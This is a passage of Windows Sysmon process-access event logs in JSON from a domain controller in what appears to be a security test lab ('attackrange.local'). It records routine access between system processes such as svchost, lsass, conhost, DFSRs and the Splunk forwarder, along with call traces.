{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1820,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1821,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1822,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1823,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1824,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.408\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-001004940300}\r\nTargetProcessId: 8\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.408","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-001004940300}","TargetProcessId":"8","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1825,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.424\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3872\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+70fae|C:\\Windows\\system32\\lsass.exe+3907|C:\\Windows\\SYSTEM32\\ntdll.dll+80a84|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.424","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"3872","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+70fae|C:\\Windows\\system32\\lsass.exe+3907|C:\\Windows\\SYSTEM32\\ntdll.dll+80a84|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1826,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.439\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nSourceProcessId: 2904\r\nSourceThreadId: 3276\r\nSourceImage: C:\\Windows\\system32\\DFSRs.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c0dd|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.439","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","SourceProcessId":"2904","SourceThreadId":"3276","SourceImage":"C:\\Windows\\system32\\DFSRs.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c0dd|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1827,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1828,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 